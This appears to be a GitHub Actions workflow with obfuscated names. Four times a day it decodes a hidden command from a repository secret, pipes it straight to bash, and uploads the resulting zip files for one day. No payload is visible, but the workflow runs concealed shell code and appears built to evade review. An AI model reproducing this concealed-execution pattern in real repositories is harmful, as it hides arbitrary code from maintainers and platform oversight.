name: zuannuningren
on:
  workflow_dispatch:

  schedule:
    - cron: '40 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zuannuningren
        env:
          x1: ${{ secrets.x1 }}
        run: |
          printf '%s' "$x1" | jq -r .x2 | /bin/bash
          printf '%s' "$ofp342" | jq -r .qfega7 | /bin/bash
          echo $b6906 | jq -r .ogd3 | /bin/bash
          echo $mpu4400 | jq -r .vuroh05085 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: CXt77J52
          path: "*.zip"
          retention-days: 1
